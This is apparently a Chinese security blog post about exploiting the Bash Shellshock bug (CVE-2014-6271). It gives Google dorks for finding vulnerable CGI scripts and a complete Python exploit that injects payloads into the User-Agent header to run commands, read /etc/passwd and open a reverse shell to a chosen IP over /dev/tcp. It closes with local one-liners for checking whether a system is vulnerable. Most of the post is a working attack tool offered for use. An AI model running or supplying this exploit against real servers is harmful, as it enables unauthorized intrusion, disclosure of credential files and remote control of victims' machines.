CVE-2014-6271 Bash漏洞利用工具
0x01: 相关介绍
个人感觉利用方式肯定比HeartBleed简单快捷,只是脆弱点不好找,而且量肯定没OpenSSL多;而HeartBleed对很多VPN渗透很有帮助。
0x02:利用条件和搜索方式
利用条件
1.env可控可写 2.派生bash子进程
Google搜索方式
filetype:sh inurl:cgi-bin filetype:cgi inurl:cgi-bin
0x03:php测试工具
http://www.exploit-db.com/exploits/34766/
php的工具可以稍微改动一下 也可以有回显 和反弹shell 当然也可以直接改cmd命令反弹
0x04:Python利用工具
#!/usr/bin/env python
#-*- coding:utf8 -*-
import urllib,httplib
import re,urlparse
from ctypes import *
import sys
reload(sys)
sys.setdefaultencoding = 'utf-8'
def bash_exp(url):
hostname, urlpath = urlparse.urlsplit(url)[1:3]
try:
conn=httplib.HTTPConnection(hostname,timeout=20)
headers={"User-Agent":'() { :;}; /bin/bash -c "id"'}
conn.request("GET",urlpath,headers=headers)
res=conn.getresponse()
if res and res.status == 500:
windll.Kernel32.GetStdHandle.restype = c_ulong
h = windll.Kernel32.GetStdHandle(c_ulong(0xfffffff5))
windll.Kernel32.SetConsoleTextAttribute(h, 12)
print "SecPulse Hint:Bash of this site is Vulnerable!"
windll.Kernel32.SetConsoleTextAttribute(h, 7)
cat_passwd(hostname,urlpath)
windll.Kernel32.SetConsoleTextAttribute(h, 10)
reverseIp = raw_input("Reverse IP & Port Like 255.255.255.1/8080: ")
if reverseIp:
try:
conn2=httplib.HTTPConnection(hostname,timeout=20)
headers2={"User-Agent":'() { :;}; /bin/bash -i >& /dev/tcp/%s 0>&1' % reverseIp}
print "Reversing~"
conn2.request("GET",urlpath,headers=headers2)
except KeyboardInterrupt:
print "Process interrupted by user."
except Exception, e:
print e
else:
print "Nothing Input,Exiting..."
windll.Kernel32.SetConsoleTextAttribute(h, 7)
else:
print "SecPulse.com Hint:No Bash Vulnerable!"
except Exception, e:
print e
def cat_passwd(hostname,urlpath):
print "cat /etc/passwd :"
conn3=httplib.HTTPConnection(hostname,timeout=20)
headers3={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn3.request("GET",urlpath,headers=headers3)
res3=conn3.getresponse()
res=res3.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]
if __name__=='__main__':
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.secpulse.com/cgi-bin/index.cgi"
sys.exit(-1)
else:
bash_exp(sys.argv[1])
0x05:Python批量搜索自动化攻击工具
考虑危害性 就不放了
0x06:Cgi大shell一枚
File Manager
Copyright 2003 Gamma Group
0x07:修复方法:
update bash
这个漏洞后期演变的很快 因为各种修复被绕过~~~老外的shellshocker.net蛮给力的列举出来了
Exploit 1 (CVE-2014-6271)
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/*release* for your OS.
原创作者:安全脉搏
SP地址:http://www.secpulse.com/archives/917.html